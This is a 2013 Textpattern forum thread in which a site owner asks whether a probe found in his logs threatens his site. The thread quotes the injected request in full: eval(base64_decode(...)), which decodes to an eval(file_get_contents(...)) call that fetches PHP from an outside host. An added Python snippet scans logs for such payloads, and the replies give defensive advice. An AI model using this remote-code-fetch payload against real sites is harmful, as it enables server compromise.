Textpattern CMS support forum

#1 2013-03-31 12:39:00

maratnugmanov
Member
From: Russia / Kazakhstan
Registered: 2013-02-24
Posts: 54
Website

Hack probing on my site detected

Here’s what I found last night in the logs:
First, someone came to my site from http://dr4g0n.name:8080/dokuwiki/doku.php?id=start,
then from another IP came this request:
?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7));

Should I arm already?

I also decoded this request from base64 to plain text; here’s the command: eval(file_get_contents('http://hw-cargo.ru/netcat_files/167/1.txt'));
You can check this txt yourself; it’s just a txt with a list of PHP commands.

So how can I check if my site is affected / infected?

Last edited by maratnugmanov (2013-03-31 12:54:46)
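
An added example, not part of the original post and not Textpattern code: one way to answer the "what was this request?" part of the question is to scan the access log for query strings that wrap a base64 blob in base64_decode(), decode the blob offline, and list any URLs it would fetch. The log lines are constructed (combined log format, documentation IP addresses); the payload is the one quoted in the post, and the function names are hypothetical.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log lines. The second request carries the payload from the post;
# the third checks that an innocent "base64" search term is not flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Mar/2013:02:10:11 +0000] "GET /articles/hello HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [31/Mar/2013:02:14:52 +0000] "GET /?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7)); HTTP/1.1" 200 4873 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Mar/2013:02:15:03 +0000] "GET /?q=base64+tutorial HTTP/1.1" 200 2291 "-" "Mozilla/5.0"
"""

# client IP, timestamp, method, request target, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# base64_decode( <blob> ), with or without quotes around the blob
INJECT_RE = re.compile(r'base64_decode\(\s*[\'"]?([A-Za-z0-9+/=]+)[\'"]?\s*\)', re.I)
URL_RE = re.compile(r'https?://[^\s\'")]+')


def decode_payload(b64):
    """Decode a base64 blob to text for inspection; return None if it is not valid base64."""
    try:
        padded = b64 + "=" * (-len(b64) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan(log_text):
    """Return one finding per base64_decode(...) call seen in a request's query string."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, when, _method, target, status = m.groups()
        # unquote (not unquote_plus) so a literal '+' inside the blob survives
        query = unquote(urlsplit(target).query)
        for hit in INJECT_RE.finditer(query):
            decoded = decode_payload(hit.group(1))
            findings.append({"ip": ip, "time": when, "status": int(status),
                             "decoded": decoded,
                             "fetches": URL_RE.findall(decoded or "")})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on such a request only means the page was served; whether the text parameter ever reaches an eval() depends on the code that handles the request, so files and permissions still need to be checked separately.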


#2 2013-03-31 13:42:58

towndock
Member
From: Oriental, NC USA
Registered: 2007-04-06
Posts: 329
Website

Re: Hack probing on my site detected

That doesn’t look like anything specific to Textpattern. It may be a question more appropriate for your web hosting company.


#3 2013-04-01 04:12:48

maratnugmanov
Member
From: Russia / Kazakhstan
Registered: 2013-02-24
Posts: 54
Website

Re: Hack probing on my site detected

So Textpattern is not affected by such a request?


#4 2013-04-01 04:47:35

bici
Member
From: vancouver
Registered: 2004-02-24
Posts: 2,072
Website Mastodon

Re: Hack probing on my site detected

maratnugmanov wrote:

So Textpattern is not affected by such a request?

No mention of Textpattern in the code you posted.

Who is your ISP? I.e., where is your site hosted? Have you asked their support staff to investigate?

Empty your log file, and double-check all the permissions on your files.

Do you have comments turned on?

Last edited by bici (2013-04-01 05:16:06)


…. texted postive


#5 2013-04-01 08:22:27

maratnugmanov
Member
From: Russia / Kazakhstan
Registered: 2013-02-24
Posts: 54
Website

Re: Hack probing on my site detected

I mean that I saw some videos of exploiting vulnerabilities in WordPress and Joomla using such commands, so the question is simple – is Textpattern vulnerable to such attacks?
Comments are on, but I don’t have any – the site is too young.
The command looks like this; it contains instructions to include PHP commands. The question is – will Textpattern try to execute those?
http://mysite.com/?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7));
I don’t think I should contact my hoster every time someone tries to use WordPress hacks on me. They just shouldn’t work.

For example, I can try to run this command on your website (which I wouldn’t do, I’m just giving an example), just by adding this to your site URL. Will you immediately contact your hoster? And how can he protect you from this random stuff? He can blacklist some IPs etc., but I don’t think there is much to investigate.

Last edited by maratnugmanov (2013-04-01 08:26:17)


#6 2013-04-01 10:25:12

gaekwad
Server grease monkey
From: People's Republic of Cornwall
Registered: 2005-11-19
Posts: 4,134
GitHub

Re: Hack probing on my site detected

Hi Marat.
If the website you are referring to is hw-cargo.ru, there are nearly 1,5000 websites on the same web server, so it’s very likely another website has compromised security. If you contact your host, there may be cleanup on other sites that is required. I agree with Giovanni, there is no mention of Textpattern in the code you posted, although since the files folder has more liberal file permissions it’s possible another website on the same server has found the files folder has 777 permissions and just used that.

I suggest deleting the 1.txt file and changing the file permissions on the files folder to 755 until the problem is solved with the rogue site.


#7 2013-04-01 15:17:54

maruchan
Member
From: Ukiah, California
Registered: 2010-06-12
Posts: 590
Website

Re: Hack probing on my site detected

This seems like it could affect Textpattern if you are not sanitizing your GET variables, and happen to be using a variable called “text”. :-)


#8 2013-04-01 20:54:24

maratnugmanov
Member
From: Russia / Kazakhstan
Registered: 2013-02-24
Posts: 54
Website

Re: Hack probing on my site detected

After my request to remove 1.txt from the first site, it was removed, but no luck – now an almost similar request is coming from another site. I already wrote about that to the possible domain registrar and possible hoster, but this time this is 100% not an infected site – this is the nest itself – the main page of the domain has malicious code, and all subdomains too – they want you to install Adobe Flash Player, and some scripts change the page address to Adobe’s to fool you.
+100 for Textpattern that it is not as common as WordPress – I don’t think that I will be affected any time soon.
